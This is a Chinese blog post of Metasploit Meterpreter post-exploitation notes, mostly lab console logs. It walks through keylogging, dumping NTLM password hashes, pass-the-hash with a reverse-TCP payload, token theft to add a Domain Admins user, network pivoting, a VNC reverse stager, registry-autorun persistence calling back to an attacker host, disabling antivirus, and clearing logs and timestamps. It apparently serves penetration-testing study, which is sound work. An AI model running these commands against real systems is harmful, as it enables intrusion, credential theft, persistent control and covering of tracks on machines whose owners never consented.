Meterpreter

最新推荐文章于 2024-05-11 20:03:59 发布
最新推荐文章于 2024-05-11 20:03:59 发布
阅读量1.9k 收藏 7
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31411551/article/details/106273262
版权

基本命令

  1. background 将meterpreter终端隐藏在后头
  2. sessions 查看已经成功获取的会话,如果想继续和某个会话进行交互,使用session -i命令
  3. quit 关闭当前会话
  4. shell 可以获取系统的控制台shell
  5. irb 可以在meterpreter中与ruby交互

文件系统命令

  1. cat 查看文件内容
  2. getwd 获得目标机上当前的工作目录
  3. upload 上传文件
    meterpreter > upload -h
Usage: upload [options] src1 src2 src3 ... destination

Uploads local files and directories to the remote machine.

OPTIONS:

    -h        Help banner
    -r        Upload recursively
  4. download 下载文件
  5. edit 可以调用vi编辑器,进行编辑
  6. search 搜索
    Usage: search [-d dir] [-r recurse] -f pattern [-f pattern]...
Search for files.

OPTIONS:

    -d <opt>  The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
    -f <opt>  A file pattern glob to search for. (e.g. *secret*.doc?)
    -h        Help Banner
    -r <opt>  Recursivly search sub directories. (Default: true)

网络命令

  1. ipconfig 查看网络接口信息
  2. portfwd 端口转发
    meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
    -R        Indicates a reverse port forward.
    -h        Help banner.
    -i <opt>  Index of the port forward entry to interact with (see the "list" command).
    -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
    -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
    -r <opt>  Forward: remote host to connect to.
meterpreter > portfwd add -l 1234 -p 6001 -r 192.168.1.130
[*] Local TCP relay created: :1234 <-> 192.168.1.130:6001
  3. route 显示路由信息

系统命令

  1. ps 获得正在运行的进程信息
  2. migrate 将meterpreter会话从一个进程移植到另一个进程中
  3. execute 在目标机上执行文件
    meterpreter > execute
Usage: execute -f file [options]
Executes a command on the remote machine.

OPTIONS:

    -H        Create the process hidden from view.
    -a <opt>  The arguments to pass to the command.
    -c        Channelized I/O (required for interaction).
    -d <opt>  The 'dummy' executable to launch when using -m.
    -f <opt>  The executable command to run.
    -h        Help menu.
    -i        Interact with the process after creating it.
    -k        Execute process on the meterpreters current desktop
    -m        Execute from memory.
    -s <opt>  Execute process in a given session as the session user
    -t        Execute process with currently impersonated thread token
meterpreter > execute -H -f cmd.exe
meterpreter > execute -H -m -d calc.exe -f wec.exe -a "-o foo.txt"
  4. getpid 获得当前会话所在进程的PID
  5. kill 终结会话
  6. getuid 获得运行meterpreter会话的用户名
  7. sysinfo 得到目标系统的一些信息
  8. shutdown 关机

1. 截屏

meterpreter > screenshot 
Screenshot saved to: /root/fLvRrVTL.jpeg

2. sysinfo

meterpreter > sysinfo
Computer        : DH-CA8822AB9589
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/win32
meterpreter >

3. 获取键盘记录,run post/windows/capture/keylog_recorder

meterpreter > ps

Process List
============

 PID   PPID  Name                 Arch  Session  User                           Path
 ---   ----  ----                 ----  -------  ----                           ----
 0     0     [System Process]                                                   
 ...        
 1308  1012  explorer.exe         x86   0        DH-CA8822AB9589\Administrator  C:\WINDOWS\Explorer.EXE
 ...

meterpreter > migrate 1308
[*] Migrating from 1420 to 1308...
[*] Migration completed successfully.
meterpreter > run post/windows/capture/keylog_recorder 

[*] Executing module against DH-CA8822AB9589
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /root/.msf4/loot/20180926160428_default_10.10.10.100_host.windows.key_347969.txt
[*] Recording keystrokes...
^C[*] User interrupt.
[*] Shutting down keylog recorder. Please wait... 

root@kali:~# vi /root/.msf4/loot/20180926160428_default_10.10.10.100_host.windows.key_347969.txt 
Keystroke log from explorer.exe on DH-CA8822AB9589 with user DH-CA8822AB9589\Administrator started at 2018-09-26 16:04:28 +0800

1qaz2w
sx3edc4rfv5tgb

Keylog Recorder exited at 2018-09-26 16:04:55 +0800

4. 挖掘用户名和密码hashdump,use priv

windows系统存储哈希值的方式一般为LAN Manager(LM)、NT LAN Manager(NTLM),或NT LAN Manager v2(NTLMv2)。
在LM存储方式中,当用户首次输入密码或更改密码的时候,密码被转换为哈希值,由于哈希长度的限制,将密码切分为7个字符一组的哈希值。以password123456的密码为例,哈希值以passwor和d123456的方式存储,所以攻击者只需要简单地破解7个字符一组的密码,而不是原始的4个字符。而NTLM的存储方式跟密码长度无关,密码password123456将作为整体转换为哈希值存储。

meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 7be839f49edcab29c3a40fe24d47335f...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::

以aad3b435开头的哈希值是一个空的或不存在的哈希值(空字串的占位符)

5. 传递哈希值

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 10.10.10.200
LHOST => 10.10.10.200
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST 10.10.10.100
RHOST => 10.10.10.100
msf exploit(psexec) > set SMBUSER administrator
SMBUSER => administrator
msf exploit(psexec) > set SMBPASS 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
SMBPASS => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf exploit(psexec) > exploit 

[*] Started reverse TCP handler on 10.10.10.200:443 
[*] 10.10.10.100:445 - Connecting to the server...
[*] 10.10.10.100:445 - Authenticating to 10.10.10.100:445 as user 'administrator'...
[-] 10.10.10.100:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Exploit completed, but no session was created.

6. 权限提升

meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > getsystem 
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > getuid
Server username: DH-CA8822AB9589\bob
meterpreter >

7. 令牌假冒

7.1 使用PS

meterpreter > ps

Process List
============

 PID   PPID  Name                 Arch  Session  User                 Path
 ---   ----  ----                 ----  -------  ----                 ----
 ...
 344   1308  cmd.exe              x86   0        DH-CA8822AB9589\Administrator  C:\WINDOWS\system32\cmd.exe
 ...

7.2 使用steal_token命令假冒域管理员账号

meterpreter > steal_token 344
Stolen token with username: DH-CA8822AB9589\Administrator

7.3 或者使用incognito模块列举出令牌

meterpreter > use incognito 
Loading extension incognito...success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
DH-CA8822AB9589\Administrator
DH-CA8822AB9589\bob
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

7.4 扮演Administrator令牌并添加一个新用户:

meterpreter > impersonate_token DH-CA8822AB9589\\Administrator
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user DH-CA8822AB9589\Administrator
meterpreter > add_user omgcompromised password -h 10.10.10.100
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[*] Attempting to add user omgcompromised to host 10.10.10.100
[+] Successfully added user
meterpreter > add_group_user "Domain Admins" omgcomoromised -h 10.10.10.100
[*] Attempting to add user omgcompromised to group Domain Admins on domain controller
10.10.10.100
[+] Successfully added user to group
meterpreter >

8. 通过跳板攻击其他机器

使用 run get_local_subnets,background,route add,route print,

meterpreter > sysinfo
Computer        : ANTENNA-B23E701
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 5
Meterpreter     : x86/windows
meterpreter > run get_local_subnets 

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.10.10.0/255.255.255.0
Local subnet: 192.168.1.0/255.255.255.0
meterpreter > background
[*] Backgrounding session 1...

msf exploit(unix/ftp/vsftpd_234_backdoor) > route add 10.10.10.0 255.255.255.0 1
[*] Route added
msf exploit(unix/ftp/vsftpd_234_backdoor) > route print

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.10.10.0         255.255.255.0      Session 1

[*] There are currently no IPv6 routes defined.

或者使用load auto_add_route,在攻击远程机器前使用,在攻破系统同时会有一个添加路由的操作

9. 使用Meterpreter脚本

VNC

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.210 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\LvyqUgisvE.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.210:4545...
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "antenna-b23e701"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

解锁桌面,run screen_unlock

迁移进程,run post/windows/manage/migrate

关闭杀毒软件,run killav

获取系统密码哈希值,run hashdump

查看目标机上所有流量,run packetrecorder -i 1

攫取系统信息,run scraper

控制持久化

运行persistence脚本让系统开机自动启动Meterpreter(-X),50秒(-i 50)重连一次,使用的端口为443(-p 443),连接的目的地址为192.168.1.210 。

meterpreter > run persistence -X -i 50 -p 443 -r 192.168.1.210

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/ANTENNA-B23E701_20180926.5455/ANTENNA-B23E701_20180926.5455.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.210 LPORT=443
[*] Persistent agent script is 99665 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\YNbvBYkWbM.vbs
[*] Executing script C:\WINDOWS\TEMP\YNbvBYkWbM.vbs
[+] Agent executed with PID 2488
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\mPPZphFTpXu
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\mPPZphFTpXu

在192.168.1.210上使用use multi/handler并设置必要的参数进行监听:

msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > set LHOST 192.168.1.210
LHOST => 192.168.1.210
msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.210:443 
[*] 192.168.1.111 - Meterpreter session 1 closed.  Reason: Died
[*] Sending stage (179779 bytes) to 192.168.1.111
[*] Meterpreter session 7 opened (192.168.1.210:443 -> 192.168.1.111:1026) at 2018-09-26 11:08:42 -0400
[*] AutoAddRoute: Routing new subnet 10.10.10.0/255.255.255.0 through session 7
[*] AutoAddRoute: Routing new subnet 192.168.1.0/255.255.255.0 through session 7
[-] The 'stdapi' extension has already been loaded.

meterpreter >

10. 将命令行shell升级为Meterpreter,sessions -u {sessionsid}

11. 通过附加的Railgun组件操作Windows API

meterpreter > irb
[*] Starting IRB shell
[*] The "client" variable holds the meterpreter client

>> client.railgun.user32.MessageBoxA(0,"Hello","World","MB_OK")
meterpreter > irb
[*] Starting IRB shell
[*] The "client" variable holds the meterpreter client

>> client.sys.config.sysinfo()
=> {"Computer"=>"ROOT-TVI862UBEH", "OS"=>"Windows .NET Server (Build 3790).", "Architecture"=>"x86", "BuildTuple"=>nil, "System Language"=>"en_US", "Domain"=>"WORKGROUP", "Logged On Users"=>2}
>> client.railgun.shell32.IsUserAnAdmin
=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>true}
>> client.railgun.kernel32.SetThreadExecutionState("ES_CONTINUOUS|ES_SYSTEM_REQUIRED")
=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>2147483648}

12. 掩踪灭迹

  • clearev 清除访问日志
  • timestomp 修改文件的创建、最后访问的时间

13. 内网拓展

  • 添加路由 用route命令添加路由
  • 进行端口扫描
  • 利用哈希口令进行攻击
  • MS08-068和MS10-046漏洞配合
  • 搭建SMB服务器 smb_relay模块
  • 结果分析

15. 信息窃取

  • dumplink 获得目标主机最近进行的系统操作,访问文件和文档的操作记录
  • enum_applications 获得目标主机安装的软件,安全更新与漏洞补丁的信息
  • keyscan 键盘记录的用户输入模块

14. 口令摄取和利用

  • 网络嗅探 sniffer模块
  • 通过浏览器进行摄取 enum_ie模块 读取缓存的IE浏览器密码
  • 系统口令摄取 hashdump 直接获取系统的密码哈希 smart_hashdump 后渗透模块hash口令利用:直接用破解工具破解或者直接重放利用psexec: 利用系统口令哈希进行传递攻击
kalimsfliak
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
REX-C系列温控器使用说明书.pdf
01-09
REX-C系列温控器使用说明书,多种量程选择,热电偶,热电阻等,仪表特的自诊断,自整定功能和智能控制功能,使操作者可通过简单的操作而获得良好的效果
meterpreter_bins:适用于 Windows 和 POSIX 的 Meterpreter Meterpreter 二进制文件
06-05
MeterpreterMetasploit 框架中的一个关键组件,它是一种高度动态的后渗透工具,用于在成功利用漏洞后与目标系统进行交互。Meterpreter 二进制文件是实现这一功能的可执行代码,支持多种操作系统平台,包括 ...
Metasploit渗透测试学习笔记——6、Meterpreter
Fly_鹏程万里
05-16 2582
这次我们通过对Metasploitable 2进行一个渗透攻击,之后使用Meterpreter进行讲解Meterpreter的使用渗透Metasploitable 2服务枚举模块使用查看配置选项设置攻击目标主机IP地址开始攻击可以看到成功返回一个MeterpreterMeterpreter命令项查看使用"help"查看Meterpreter命令选择项Meterpreter命令详解基本命令1、bac...
msf会话终止
最新发布
2302_77302329的博客
05-11 273
msf(metasploit framework) meterpreter session closed Reason: Died 会话终止。
关于 后渗透 - Meterpreter 的使用
辉小鱼的博客
09-05 2260
关于 Metasploit (MSF) 工具的后渗透 - Meterpreter 的学习与使用。了解一些漏洞的基本原理及使用方法。
meterpreter实用命令---个人实战整理
weixin_44155363的博客
03-25 1220
meterpreter实用命令 1、background命令 返回,把meterpreter后台挂起 2、session命令 session 命令可以查看已经成功获取的会话 可以使用session -i 连接到指定序号的meterpreter会话已继续利用 3、shell命令 获取目标主机的远程命令行shell 如果出错,考虑是目标主机限制了cmd.exe的访问权,可以使用migrate注入到管理...
漏洞利用二:Meterpreter后期攻击方法使用
ZY95001的博客
09-04 1420
一、shell命令 1、shell (进入靶机cmd) 2、whoami命令:查看当前用户权限。 可知当进行攻击后,入侵者当前权限为最高权限用户system(win权限排名:system>administrator>普通用户) 3、net user命令:显示当前所有用户,本机为system,除此之外还存在下图另三个 4.exit退出当前路径 二、上传文件、执行操作 1.上传本机的任意文件到目标主机中。 在物理机上生成木马文件 打开软件pcshare...
meterpreter环境下的命令集
12-13
Meterpreter 环境下的命令集 Meterpreter 环境下的命令集是 Metasploit 框架下一个非常强大的工具,提供了一组丰富的命令来帮助攻击者在渗透测试中获取目标系统的控制权。下面我们对 Meterpreter 环境下的命令集...
clr-meterpreterMeterpreter的CLR实现的完整故事
02-05
该存储库包含围绕打算在CLR上运行的Meterpreter的新实现的开发而产生的所有杂音和工件。 整个项目都在上进行直播,并在和存档。 有关此项目的基本原理,请参阅我的,并查看下面的第1部分。 这将花费很长时间,并且...
powershell-reverse-http:一个Powershell漏洞利用服务,可通过meterpreter打开反向HTTP连接
05-27
我不鼓励以任何方式非法使用该软件或未经其事先授权而攻击目标类似Meterpreter的后门是一种非常常见的攻击媒介,大多数不错的防病毒软件都将这种行为检测为病毒。 一个在后台运行的简单Windows服务,该服务通过http...
79-79.渗透测试-meterpreter介绍.mp4
05-10
79-79.渗透测试-meterpreter介绍.mp4
meterpreter常用命令
m0_52421380的博客
08-12 2412
MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。Meterpreter功能强大,支持信息收集、提权、注册表操作、哈希利用、截屏录屏等操作,也支持对摄像头、录音设备、键盘鼠标的控制。可以使用meterpreter自带的功能实现控制对方手机和电脑。nc,全称为NetworkConnection,是一种网络连接的工具,可以用来在两台计算机之间建立网络连接。
Kali-linux使用假冒令牌
2301_77162959的博客
06-07 69
使用假冒令牌可以假冒一个网络中的另一个用户进行各种操作,如提升用户权限、创建用户和组等。令牌包括登录会话的安全信息,如用户身份识别、用户组和用户权限。当一个用户登录Windows系统时,它被给定一个访问令牌作为它认证会话的一部分。例如,一个入侵用户可能需要以域管理员处理一个特定任务,当它使用令牌便可假冒域管理员进行工作。
安全之令牌获取
weixin_47679436的博客
05-16 270
1.use incognito 2. list_tokens -u 3. impersonate_token “WIN-4NG98EKPKSR\86158”meterpreter > use incognito [!] The “incognito” extension has already been loaded. meterpreter > list_tokens -u [-] Warning: Not currently running as SYSTEM, not all tokens will
后渗透阶段-meterpreter使用
weixin_39986112的博客
04-08 412
sessions -l 查看我们获得的shell session -i 1 即可切换到id为1的shell sysinfo 查看目标主机的信息 getwd 可以获取当前目标机器的工作目录,也可以获得当前系统的工作目录 route 可以查看路由 getproxy #查看代理信息 autoroute添加路由 run autoroute –h #查看帮助 ...
Metasploit内网渗透大杀器
Grey的博客
03-30 3203
一、基础用法1.数据库连接#1 首先启动postgresql数据库:/etc/init.d/postgresql start;或者 service postgresql start;#2 初始化MSF数据库(关键步骤!):msfdb init;#3 运行msfconsole:msfconsole;#4 在msf中查看数据库连接状态:db_status。如果不想每次开机都这样,还可以配置随系统启动u...
meterpreter之getsystem命令提权详解
redwand的博客
07-23 7756
meterpreter shell是msf上集成的一组功能强大的shell集合,当我们获取一个反弹的meterpreter shell时,可以轻松的通过各种命令对靶机进行控制。熟悉的meterpreter的同学都清楚,其中有一个getsystem命令,帮助文档说明是提权用的,没有更详细的说明,很多人会误解为这是meterpreter的一键提权工具,但每次输入这个命令,都会爆出各种“incorrect“和”denied“,本文将通过理论和实验说明此命令的适用环境及提权过程。
Metasploit 读书笔记-神器Meterpreter
weixin_30907935的博客
04-02 31
一、基本命令截屏screenshot2.获取系统平台信息sysinfo3.进程信息ps4.获取键盘记录查看进程信息ps--migrate将会话迁移至explorer.exe进程空间中---然后--run post/windows/capture/keylog_recorder过一段时间CTRL+C中止。最后在另一个终端里,可以看到我们使用键盘记录所捕捉的内容。5.提取密码哈希use p...
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 8472
MeterpreterMetasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
meterpreter
06-06
Meterpreter是一个强大的后渗透框架,是Metasploit渗透测试框架中的一个模块,它提供了一个交互式的命令行接口,可以在受害者计算机上执行各种操作,包括文件系统操作、网络操作、系统管理等。Meterpreter模块可以在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值